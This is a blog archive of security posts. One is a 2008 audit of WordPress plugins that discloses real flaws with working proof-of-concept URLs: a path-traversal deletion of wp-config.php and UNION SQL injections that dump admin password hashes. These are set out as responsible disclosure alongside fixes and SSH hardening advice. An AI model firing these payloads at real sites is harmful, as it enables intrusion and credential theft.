Tag Archives: Security

Using WordPress Securely

This post is written for blog readers and blog owners. I am not an expert, only a user. If you find any mistakes or you have some ideas, please feel free to tell me.

For blog readers

Do not register

Most blogs allow non-members to comment, so I can see no reason to register.

How many blogs do you know that support HTTP over SSL? Without it, your password or your cookie (a hash of a hash of a hash of your password) travels in clear text. Your classmates, roommates, colleagues, fellow users of an unencrypted wifi network, brother(s), sister(s) (don’t underestimate females), boyfriend(s)/girlfriend(s) (plural is possible nowadays) or whoever helps pass the notes along are probably enjoying it.

It’s easy to find out whether a blog’s web server supports SSL: a) check the address bar; if you read https, that’s it; or b) read the HTML source and check the login form’s action attribute; if there is https in it, that’s it.

However, SSL may by default only be used during login, meaning your cookie may still be sent insecurely afterwards (the cookie would also need its secure attribute set). You can force https for the whole session, but unauthenticated content may then fail to load.

If someone gets your cookie, they can log in and do whatever you can, like changing your password (I wonder why WordPress doesn’t ask for your old password?). No need to mention what happens if they get your password.

Do you know the blog owner?

How do you know s/he didn’t modify a WordPress core file? (Actually, that only takes a line or two, and then s/he can get your password while you are registering or logging in.)

If you really need to register, you must use a unique, special password for each blog.

Once again, password matters

You probably think that even if someone gets the hash of your password it’s OK, since at least they don’t have your password in clear text. That’s completely true, unless you use a lazy password! I personally believe there are people who can recite the md5 or sha1 hash of passwords like “123” or “abc” from memory. Yes, some lazy passwords are more complicated than that. But I also heard there is a DVD that stores hashes of strings.

For blog owners

Do not allow blog reader to register


Spotting vulnerabilities of plugins on WordPress Extend

This is the first time I have tried to find vulnerabilities in a piece of software, and it is a one-time project (spotting them takes too much time). I used WordPress 2.3.3 for testing. I exported all plugins from the WordPress Extend plugin repository between 2008-02-05 08:00 and 10:49; the revisions ranged from r30828 to r30834, 2650 plugin directories.

It’s impossible to check them one by one and I am not a security expert, so I only did

grep -nr "\$wpdb.*\$_GET" * > wpdb-GET.txt

and the same for POST, REQUEST and fopen. I may not check all of them; I only check those that work (some have bugs) and are quite new (updated after 2007). After I finish GET, I may skip to checking fopen.

You probably think I will miss a lot of possible vulnerabilities. Yes, plugin developers may retrieve form data before building a SQL statement. I can’t check everything; if you have time, please check the plugins you use on your blog and tell me what you find.

Currently I am checking GET and I was planning to finish it before posting this, but the first plugin in which I spotted a vulnerability has around 100 downloads a day. So I decided to keep updating this post whenever I find something (I hope I won’t find something in my own plugins).

A few hours later, I still hadn’t spotted a new one. So I will keep an eye on Recently Updated plugins, and this becomes an ongoing project.

Got my mail?

If you get my mail about your plugin, please check the testing data and secure your plugin. Please inform me as soon as you have fixed the security holes. I will wait at least one week before I release the testing data. If I have made a mistake and mis-tested your plugin, please let me know; I am sorry in advance.

Suggestions

  • Secure SQL statements:
    • Validate all form data before putting it into a SQL statement, for example with (int), intval(), is_numeric(), etc.
    • Use $wpdb->escape() to wrap form data; this function encodes "\\;$%20.',//_/**/+\"- --" into "\\\\;$%20.\\',//_/**/+\\"- --".
    • $wpdb->prepare() is a better way to query.
  • Always check the user’s privileges for actions that need higher-level permissions.
  • Remove irrelevant files from the repository, such as .cache, .hg, etc.
  • Don’t make blog owners install files that won’t be used, such as readme.txt and screenshots.

Spotted plugins

Currently 3 plugins with vulnerabilities have been found. Detailed testing data will be released as soon as the plugins get fixed, or at least one week after being spotted.

lenky-related-links 1.0.2 – Fixed on Feb 12, 2008 in version 1.0.3

Spotted at 2008-02-11T09:02:34+0800. Informed at 2008-02-11T09:07:45+0800 via contact form. As of 2008-02-11T09:02:39+0800, lenky-related-links has 4 downloads.

File deletion

http://test.dfed/wp/wp-content/plugins/lenkyex/cache_del.php?f=../../../../wp-config.php

statpress 1.2.3 – Fixed on Feb 10, 2008 in version 1.2.4

Spotted at 2008-02-06T23:21:21+0800. Informed at 2008-02-07T00:42:49+0800 via contact form. As of 2008-02-06T23:46:52+0800, statpress has 20,631 downloads.

No user privilege checking when exporting data

http://test.dfed/wp/wp-admin/index.php?page=statpress&statpress_action=exportnow&from=20080101&to=20080301

Cause – L12 at statpress.php:

if ($_GET['statpress_action'] == 'exportnow') {
    iriStatPressExportNow();
}

This makes a global hole, meaning you can trigger the export from almost every blog page. Just moving this block of code into the admin-page hooked function should patch this hole.

SQL Injection

http://test.dfed/wp/wp-admin/index.php?page=statpress&statpress_action=exportnow&from=20080101&to=20080301'%20union%20select%202,concat(user_login,0x2f,user_pass,0x2f,user_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20wp_users%20where%20id=1%20and%20id!='

You can remove id=1%20and%20 in order to export the password hashes of all accounts.

Sample of export data:

date;time;ip;urlrequested;agent;referrer;search;nation;os;browser;searchengine;spider;feed
"20080206";"22:49:38";"192.168.1.12";"/wp/";"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.10) Gecko/20071213 Fedora/2.0.0.10-3.fc8 Firefox/2.0.0.10";"";"";"";"Linux";"Firefox 2";"";"";""
"admin/202cb962ac59075b964b07152d234b70/admin@gmail.com";"3";"4";"5";"6";"7";"8";"9";"10";"11";"12";"13";"14"

Cause – same as the previous hole, with:

function iriStatPressExportNow() {
    global $wpdb;
    $table_name = $wpdb->prefix . "statpress";
    $filename=get_bloginfo('title' )."-statpress_".$_GET['from']."-".$_GET['to'].".csv";
    header('Content-Description: File Transfer');
    header("Content-Disposition: attachment; filename=$filename");
    header('Content-Type: text/plain charset=' . get_option('blog_charset'), true);
    $qry = $wpdb->get_results("SELECT * FROM $table_name WHERE date>='".$_GET['from']."' AND date<='".$_GET['to']."';");

Validate both $_GET['from'] and $_GET['to'] to fix.


wp-photo-album 1.0 (http://wordpress.org/extend/plugins/wp-photo-album/) – Fixed on Feb 7, 2008 6:38 PM in version 1.1

Spotted at 2008-02-07T02:57:02+0800. Informed at 2008-02-07T03:02:56+0800 via email. As of 2008-02-07T02:58:35+0800, wppa has 83 downloads.

SQL Injection

http://test.dfed/wp/?page_id=3&album=1&photo=123456789%20union%20select%20concat(user_login,0x2f,user_pass,0x2f,user_email)%20from%20wp_users%20where%20id=1

Where photo=123456789 is a non-existent photo.

You will get something like

admin/202cb962ac59075b964b07152d234b70/admin@gmail.com

Cause – L1001 at wppa.php:

// get the name of a full sized image
function wppa_photo_name($id = '', $return = FALSE) {
    global $wpdb;
    if ($id == '') { $id = $_GET['photo']; }
    $name = $wpdb->get_var("SELECT name FROM " . PHOTO_TABLE . " WHERE id=$id");
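As an added example (not the statpress or wppa code), here is how both causes above can be closed the way the Suggestions list describes; the admin_init hook, the manage_options capability and the function names are my assumptions, and the CSV writing is left out.

```php
<?php
// Added example, not the plugins' own code: the two holes above closed the way
// the Suggestions list describes. Names other than WordPress's own ($wpdb,
// current_user_can, add_action, wp_die) are assumed.

function statpress_valid_date( $value ) {
    // The export only ever needs YYYYMMDD, so accept exactly eight digits.
    return is_string( $value ) && preg_match( '/^\d{8}$/', $value ) === 1;
}

function statpress_export_now_secure() {
    global $wpdb;
    $from = isset( $_GET['from'] ) ? $_GET['from'] : '';
    $to   = isset( $_GET['to'] )   ? $_GET['to']   : '';
    if ( ! statpress_valid_date( $from ) || ! statpress_valid_date( $to ) ) {
        wp_die( 'Invalid date range' );
    }
    $table_name = $wpdb->prefix . 'statpress';
    // %s is quoted and escaped by prepare(); the table name never comes from the request.
    $rows = $wpdb->get_results( $wpdb->prepare(
        "SELECT * FROM $table_name WHERE date >= %s AND date <= %s",
        $from, $to
    ) );
    // ... send the headers and write $rows as CSV as the original did ...
}

function statpress_maybe_export() {
    // admin_init fires before any admin HTML is output (headers can still be
    // sent) and never on public blog pages, unlike the original global check.
    if ( ! isset( $_GET['page'], $_GET['statpress_action'] )
        || $_GET['page'] !== 'statpress'
        || $_GET['statpress_action'] !== 'exportnow' ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {   // privilege check
        wp_die( 'You are not allowed to export statistics.' );
    }
    statpress_export_now_secure();
    exit;
}
add_action( 'admin_init', 'statpress_maybe_export' );

// wppa: cast the id and bind it as an integer, so nothing appended to photo= reaches the query.
function wppa_photo_name_secure( $id = '' ) {
    global $wpdb;
    if ( $id === '' ) { $id = isset( $_GET['photo'] ) ? $_GET['photo'] : 0; }
    $id = (int) $id;
    return $wpdb->get_var( $wpdb->prepare(
        'SELECT name FROM ' . PHOTO_TABLE . ' WHERE id = %d', $id ) );
}
```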


Securing SSH

This post is about what I have learned for protecting SSH (Secure Shell) from being hacked. Please advise me if I miss or get something wrong.

Username and Password

Do not use common words as your username or password, and never use your username as your password. This applies to everything that needs a username and password. Read Password strength if you need a good password. In my opinion, if you need to write your password down somewhere, including in software, then it’s not a good password. Currently our brain is the safest place to keep it, but not quite reliable.

When I see someone trying to get into my laptop, they usually try names like bob or bill, or services’ names, and definitely root. If your name is bob, don’t be happy when the username bob is available on a social networking website; you would be a very likely target.

Using Public Key

Using a public key has two benefits: a) you don’t need to type your password, though a passphrase may (must, read on) be needed; b) it guarantees high security strength.

b) doesn’t mean you can use a lazy password or that you won’t be hacked. It only says that it’s *almost* impossible for someone to break into your account by guessing or computing the correct key. But if someone can break into your account on your computer, they can get your keys. They may not even need to break in; wrong permissions on directories and files can be enough. This is more likely to be overlooked by Windows users. Even if you protect your files flawlessly, there is always a target for bad people: root. root can do anything. Therefore, you must set a passphrase for your keys. If you haven’t, please run

ssh-keygen -p

to set one. This ensures your private key is stored encrypted rather than in clear text.

Generating a Key

Simply follow ssh-keygen. After generating the key, if you have ssh-copy-id, you can run (tip from Charles Harris, thanks!)

ssh-copy-id -i ~/.ssh/id_rsa.pub username@remote

If you don’t have it, do the following:

Transfer ~/.ssh/id_rsa.pub to the remote server (scp is a good way to transfer it), then run on the remote server

cat id_rsa.pub >> ~/.ssh/authorized_keys
rm id_rsa.pub

On both the remote server and locally, make sure

chmod 700 ~/.ssh
chmod 600 ~/.ssh/*

Enhancing /etc/ssh/sshd_config


Hacked due to security leak of hosting company

This post revealed the leak at Dreamhost. 3500 ftp passwords have been stolen and you can’t read any information about it on Dreamhost’s status page or official blog. I am not a customer of Dreamhost. I am happy that I chose bluehost, but this doesn’t mean bluehost won’t be hacked. “Hack” might not be the correct word, because Dreamhost didn’t say how those passwords were stolen. Maybe it was an inside job. Of course, they can’t admit it if it was, because that’s worse than being hacked. We all know an ftp password may not be used only for ftp; it could be the password for everything if the user is lazy and not vigilant.

There is a comment on caydel.com:

They just send a mail to all users who had the password “1234”.

How could Dreamhost know your password? Does that mean all passwords are stored unencrypted, or that decrypting them is possible? Or do many people use “1234” as their password and the staff noticed lots of encryptions of “1234”?

You can see some ad-like comments suggesting better hosting companies. “An opponent’s leak is a benefit.”

Surfing more secure with Firefox

The websites

Yesterday I found a website made by McAfee called SiteAdvisor. It gives you some information about the site you are visiting or about to visit. It provides information about

  • email – It checks all forms on the target website for a possible sign-up form with an email address. It signs up with an email address and counts the emails sent to that address.
  • files – It downloads files from the target website and scans them.
  • affiliations – A link map of the websites linked to by the target website.
  • annoyances – Pop-ups, etc.

Here is a sample report. And there is an extension for Firefox that lets you tell directly from a search engine’s result page whether websites are safe or not. If you use Internet Explorer, you can install a plugin too. But I strongly suggest you use Firefox, or at least something other than Internet Explorer.

The SiteAdvisor toolbar icon also shows whether the current website is safe or not. Right now, the number of websites SiteAdvisor has tested is not that large, but you can ask it to test the websites you want. I don’t know when you would get the report, though.

The passwords

google, yahoo, digg, del.icio.us, myspace, msn… There are hundreds of websites you use in daily life. Do you use a different password for each website? Are your passwords strong enough? Do you change your passwords regularly? If your answers to all those questions are YES, I think you are an incredible person.

I will give you a safer solution for your passwords. It’s an extension for Firefox called Password Hasher. Basically, your password for a website is generated from two elements, a Site tag and a Master Key. The Site tag is different for each website, and the Master Key can be a single strong password. That means you only need to remember one strong password and can use it to access many websites more safely. It adds a # button next to the password field for entering the password easily.

P.S. But you must understand that a strong password doesn’t mean you are really safe. A trojan horse can steal your password, and hacking the website can get your information (or password). There is no real safety in this world.
